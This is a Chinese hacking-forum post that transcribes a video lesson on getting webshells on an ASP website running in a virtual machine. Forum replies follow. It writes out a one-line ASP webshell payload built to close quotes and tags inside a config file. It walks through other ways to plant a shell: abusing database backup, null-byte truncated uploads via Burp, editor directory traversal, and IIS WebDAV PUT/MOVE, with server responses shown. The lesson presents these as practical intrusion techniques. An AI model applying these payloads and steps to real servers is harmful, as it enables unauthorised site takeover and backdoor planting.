HACK80 首页  立即注册  登录
现在注册
已注册用户请  登录
HACK80    视频教程

公开课第十四节-常见拿webshell的方法第二部分(实战)

  •   admin ·2014-6-28 13:21:47·188845 次点击 ·阅读模式     

    马上注册,加入HACK80!与我们一起交流。

    您需要 登录 才可以下载或查看,没有帐号?立即注册

    x
    本节课主要内容为常见拿webshell的方法第二部分(实战)
    捕获.PNG

    视频长度:38:38
    视频下载:http://pan.baidu.com/s/1c0nHQms
    解压密码:
    游客,如果您要查看本帖隐藏内容请回复


    文字说明:
    大家好,欢迎来到由HACK80为大家带来的大型公益培训系列教程。。
    我是本系列课程的讲师。
    我的QQ是1662534536
    hack80官方地址是http://www.hack80.com

    上节课我们理论的讲了一下常见的拿webshell的方法。
    那么本节课来实战一部分。。
    首先先来看下上节课的表,各位再回味一下。
    虚拟机搭建的。
    通过注入的那节课已经说了它的账号密码,扫后台的课也扫到了后台。
    那么我们就直接进入后台吧
    好的,这就是后台的主页面了
    来看下表,一个一个的来。
    第一种是直接上传的。
    普遍是存在在网站配置这里哦
    允许的上传文件类型:
    只输入扩展名。每种文件类型用“|”号分开。
    看到了这里没?能够自定义上传类型的,平时的话,直接加
    成功的加上去了。
    但是我注意了一下,这个网站程序的自带的上传功能不能用,
    所以。。这个就实验不了,可能是需要买吧,,,
    那也还是来找一下
    在自带的上传这里,都是没有的。
    这是第一个方法。
    然后是往配置文件里插马
    先来看一下配置文件在哪里
    http://192.168.76.128/inc/config.asp
    这个。我们进虚拟机看一下
    看到了,是这个。
    我们来分析一下配置文件是怎么写的
    <%
        const xxxx xxxxx= "xxxxx"  '这里是注释。
        应该就是这样。
    %>
    我们需要闭合前面的<%和后面的%>还有中间的双引号
    来构造一下
    const xxxx xxxxx= "xxxxx"%><%eval request("c")%><%'"  '这里是注释。
    看下我们加的内容
    "%><%eval request("c")%><%'
    第一个双引号闭合前面的双引号,%>闭合最前面的<%然后是一句话木马然后<%闭合最后面的%>
    加了一个单引号 是注释本行后面的东西。我们来写入试试

    刷新可以看到网站正常。如果插坏了的话,一会给你们演示
    我们来链接一下密码 是c
    看到了吧,可以链接的,是成功的闭合了的
    我们来看一下,如果闭合错了 会出现什么问题。
    少加个双引号试试
    看到了吧,整站都煞笔了。。。所以往配置文件写马这个,一定要有十足的把握才写哦,否则就是这操行了。
    这个就是数据库插马
    这个数据库备份等会说,用下一套源码,这个源码没法上传文件,蛋疼。
    我们来看下编辑器吧。
    我鼠标移到这里,你们看下浏览器左下角的东西
    http://192.168.76.128/admin/Editor/uploadfile.asp?id=49
    看到了吧,我们打开一下看看
    目录是存在的猜下编辑器地址
    打不开  有可能是后台删了
    也可以用admin_style.asp来测试,也可以出上传界面
    看来这个编辑器是阉割版的了。
    我们找找上传地址
    这个是存在的,看看有没有遍历目录的洞
    点一下返回上一级目录
    看到了吧,整个C盘已经列出来了
    站点跟目录的
    这是一个技巧,还有一个就是这个
    也有上传界面,我们来试试用IE5打开
    高版本的浏览器功能出不全
    看来这个上传也是利用不了的。。虽然他显示上传成功了,不过这个方法在实际的渗透中可能会用到的
    至少我曾经用到过,先进后台克隆样式,但是没法打开上传界面找到这个界面来上传,
    还有一种是往ewebeditor的数据库中插马,如果存在脚本格式的数据库
    比如#ewebeditor.asp  ewebeditor#.asp  ewebeditor#.asa
    我们这个程序的编辑器是带有这个地址的,但是没有后台,就无法上传,
    下面来说数据库备份
    随便找个地方上传个图片格式的木马,回想一下上节课的内容。
    请先选择你要上传的文件!
    提示这个东西了,说明你的文件太小了。。
    这回应该行了
    复制这个地址,我们是要把他通过数据备份的功能,备份成木马格式
    数据库备份完成,请进行其他操作!
    备份完成了,可是却没给路径,我们怎么找呢?
    /Databackup这是数据库备份文件的目录,名称是这个hack80.asp
    构造一下
    http://192.168.76.128/Databackup/hack80.asp
    看到了吧。
    成功备份获得shell了。、
    截断上传。跟以前的nc 抓包 改包 提交上传一样,我们这里用一个burp 就可以了
    设置好代理 和浏览器的代理。
    注意哦  后面有个空格,我们通过hex编码吧他弄成00,
    为什么要这么做,上节课说过了,不再累述。
    空格的hex编码也是20  改成00
    然后上传  一片空白,查看源代码试试
    去虚拟机看看是否上传成功了
    注意时间。
    看到了?上传成功了,这就是截断上传。
    既然是在iis下,就再说下iis写权限,原因是服务器管理员在做配置的时候,开启了网站目录的写入的权限。
    可以扫描网段,自定义端口的。我们这里就是80
    点击scan开始扫描
    显示可以利用 可以上传
    看好哦  是txt格式
    我们先看一下,这个文件是不存在的
    HTTP/1.1 201 Created
    Date: Thu, 19 Jun 2014 16:29:13 GMT
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    Location: http://192.168.76.128/test.txt
    Content-Length: 0
    Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK
    成功创建了
    我日,没改名,真蛋疼。。看到了,是txt格式的,我们要把它变成脚本格式的
    HTTP/1.1 201 Created
    Date: Thu, 19 Jun 2014 16:30:26 GMT
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    Location: http://192.168.76.128/shell.asp
    Content-Type: text/xml
    Content-Length: 0


    看到了?
    关于这个注入点的,之前的实战课程已经讲过了。就不再多说了
    剩下的,有时间就说说。
    行了,这节课就这么多东西,回去消化一下啊
    希望大家支持我们hack80论坛
    http://www.hack80.com
    谢谢收看
     1    金币 +1
    188845 次点击 · 3 人收藏  
    收藏  转播  分享
    49 回复
      Reply  
    眷恋轮回  2014-6-28 13:26:21 
    马上来顶了!!!!!!!!!!!!!!!!!!!!!!!!!!
      Reply  
    眷恋轮回  2014-6-28 13:31:10 
    我来低调路过!!!!!!!!!!!!!!
      Reply  
    gudubashen00  2014-6-28 14:18:24 
    求解压码啊啊啊啊。
      Reply  
    gg666888000  2014-6-28 14:54:55 
    慢慢研究,{:4_133:}
      Reply  
    1065933657  2014-6-28 15:24:21 
    顶一个,再顶一个
      Reply  
    小思  2014-6-28 15:26:39 
    老大你又出现了 必顶 大家好好学习不好枉费老大的辛苦
      Reply  
    1013029551  2014-6-28 17:15:27 
    支持呀亲!
      Reply  
    SUN_CY471  2014-6-28 17:34:16 
    支持。。,,,,
      Reply  
    Hunter  2014-6-28 19:43:03 
    顶起  低调路过、、、、、、、、、、、、、
    12345下一页
    添加一条新回复
    您需要登录后才可以回帖 登录 | 立即注册

    本节点积分规则
    QQ
    小黑屋   ·   手机版   ·   167 人在线 最高记录 5500   ·   TOP
    我们很年轻,但我们有信念、有梦想!

      我们坚信只有今天付出了,才有机会看到明天的太阳!现在!加入我们,给你一个气氛优秀的技术圈子。  
    GMT+8, 2018-6-19 08:56, Processed in 0.054227 second(s), 29 queries .